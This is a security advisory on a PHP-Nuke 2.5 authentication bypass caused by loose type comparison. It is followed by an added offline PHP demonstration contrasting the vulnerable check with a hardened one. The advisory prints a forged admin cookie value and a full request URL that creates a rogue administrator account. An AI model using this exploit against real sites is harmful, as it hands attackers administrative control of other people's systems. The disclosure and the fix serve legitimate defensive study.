Summary

Security vulnerability in PHP-Nuke, a news site administration package, allows a remote attacker to gain administrative access to the application. PHP-Nuke is open source and can be freely downloaded at:
http://linuxpreview.org/php-nuke.php3?op=english

Versions affected: ALL (current PHP-Nuke 2.5 or lower)

Details

Let's take a look at how PHP-Nuke authenticates administrative accounts. In the auth.inc.php3 file, line 31:

    $admintest = 0;
    if(isset($admin)) {
        if(!IsSet($mainfile)) { include("mainfile.php3"); }
        $admin = base64_decode($admin);
        $admin = explode(":", $admin);
        $aid = "$admin[0]";
        $pwd = "$admin[1]";
        dbconnect();
        $result=mysql_query("select pwd from authors where aid='$aid'");
        if(!$result) {
            echo "Selection from database failed!";
            exit;
        } else {
            list($pass)=mysql_fetch_row($result);
            if($pass == $pwd) {
                $admintest = 1;
            }
        }
    }

Here some checks are done on the $admin value. Since any variable, whether from cookies or from forms (GET/POST), is automatically made global to the script by PHP, we can supply our own $admin value in the URL. If $pwd (an element of the "scrambled" $admin) does not match the value in the fetched row, authentication fails ($admintest = 0); otherwise we are able to access any function in admin.php3. Sounds normal, until you read the following exploit.

The Exploit

The theory is simply to make $pass == $pwd. The $pass value obtained through mysql_fetch_row() could be anything, or could be FALSE if there are no rows (the query matched no author). So how about making $pwd (string-type) and $pass (logical-type) equally false? Yep, that satisfies the condition. The expression "if($pass == $pwd)" compares only values, NOT types. So setting $pwd = "" (the empty string) will be EQUAL (though not identical) to the FALSE value of $pass.

The rest is much simpler. Putting any string value NOT listed in the authors database into $aid will do: mysql_query() still returns a TRUE (non-FALSE) result for an empty result set, and mysql_fetch_row() then returns FALSE. So, crafting our $admin value:

    $aid = "blabla";
    $pwd = "";
    $admin = base64_encode("$aid:$pwd");

will give us "YmxhYmxhOg==". Using this value, we are now able to access all functions in admin.php3. The following URL will add an account "godbless:indonesia" to the authors database:

http://site//admin.php3?admin=YmxhYmxhOg%3D%3D&op=AddAuthor&add_aid=godbless&add_name=Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me

Looking at the options, the administrator can edit users, articles, topics, banners, assign authors, etc.

Fabian Clone
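The following is an added example, not code from PHP-Nuke or from the advisory's author. It re-implements the auth.inc.php3 check against an in-memory "authors" table (a constructed stand-in for the MySQL query, so it runs offline), shows that the forged "YmxhYmxhOg==" value passes the loose == comparison while a hardened check rejects it, and keeps a genuine author working. The table contents, the function names (forge_admin, admintest_vulnerable, admintest_fixed, fetch_pwd_row) and the sample credentials are this example's own assumptions.

```php
<?php
// Added example, not PHP-Nuke code. Constructed authors table: aid => pwd
// (PHP-Nuke 2.5 compared the stored pwd column directly, as in auth.inc.php3).
$AUTHORS = ['god' => 's3cret'];

// Stand-in for mysql_query() + mysql_fetch_row(): returns [pwd] for a known
// aid, or FALSE when no row matches, which is what mysql_fetch_row() returns
// on an empty result set.
function fetch_pwd_row(array $authors, string $aid) {
    return array_key_exists($aid, $authors) ? [$authors[$aid]] : false;
}

// Build the $admin value exactly as the advisory does: base64("aid:pwd").
function forge_admin(string $aid, string $pwd): string {
    return base64_encode("$aid:$pwd");
}

// Vulnerable check, mirroring the logic of auth.inc.php3 line 31 onward.
function admintest_vulnerable(array $authors, string $admin): int {
    $parts = explode(':', base64_decode($admin));
    $aid = $parts[0];
    $pwd = isset($parts[1]) ? $parts[1] : '';   // "$admin[1]" on a missing index is ""
    $row = fetch_pwd_row($authors, $aid);
    // list($pass) = mysql_fetch_row(...) with a FALSE row leaves $pass empty
    $pass = ($row === false) ? false : $row[0];
    // Loose comparison: FALSE == "" evaluates to true, so an unknown aid with
    // an empty password is accepted.
    return ($pass == $pwd) ? 1 : 0;
}

// Hardened check: strict decoding, exactly two fields, no empty password,
// a row must exist, and the comparison is type-strict and constant-time.
// (Against a real database, bind $aid with a prepared statement rather than
// interpolating it into the query string.)
function admintest_fixed(array $authors, string $admin): int {
    $decoded = base64_decode($admin, true);
    if ($decoded === false) {
        return 0;
    }
    $parts = explode(':', $decoded, 2);
    if (count($parts) !== 2) {
        return 0;
    }
    list($aid, $pwd) = $parts;
    if ($pwd === '') {
        return 0;
    }
    $row = fetch_pwd_row($authors, $aid);
    if ($row === false) {
        return 0;
    }
    return hash_equals((string) $row[0], $pwd) ? 1 : 0;
}

$forged = forge_admin('blabla', '');      // the advisory's "YmxhYmxhOg==" value
$real   = forge_admin('god', 's3cret');   // constructed genuine author cookie

printf("forged value: %s\n", $forged);
printf("forged  -> vulnerable=%d fixed=%d\n",
    admintest_vulnerable($AUTHORS, $forged), admintest_fixed($AUTHORS, $forged));
printf("genuine -> vulnerable=%d fixed=%d\n",
    admintest_vulnerable($AUTHORS, $real), admintest_fixed($AUTHORS, $real));
```

Run with `php example.php`: the forged value yields 1 from the vulnerable check and 0 from the fixed one, while the genuine credential yields 1 from both. The decisive fix is refusing to treat "no row" as a password and comparing with a strict, type-aware check; the empty-password guard is belt and braces, since an empty stored pwd would otherwise still match an empty supplied one.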